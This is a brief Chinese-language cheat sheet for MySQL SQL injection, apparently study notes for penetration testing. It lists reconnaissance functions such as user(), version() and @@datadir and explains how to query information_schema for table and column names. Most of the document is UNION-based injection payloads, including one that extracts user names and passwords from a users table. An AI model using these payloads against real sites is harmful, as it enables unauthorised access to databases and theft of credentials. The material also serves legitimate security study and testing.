DB用户user()
DB版本version()
全局函数@@datadir、@@hostname
@@VERSION、@@version_compile_os
当前库database()
• ASCII转字符char()
• 连接字符串CONCAT_WS(CHAR(32,58,32),user(),database(),version())
table_schema 数据库名
information_schema.tables 数据库表数据
table_name 表名
information_schema.columns 数据库列数据
column_name 列名
所有库所有表/ 统计每个库中表的数量
• ‘union select table_name,table_schema from information_schema.tables--+
• 'UNION select table_schema,count(*) FROM information_Schema.tables group bytable_schema --
在一个字段中同时查出多个数据,并用冒号隔开:
'union select null, concat(user,0x3a,password) from users--+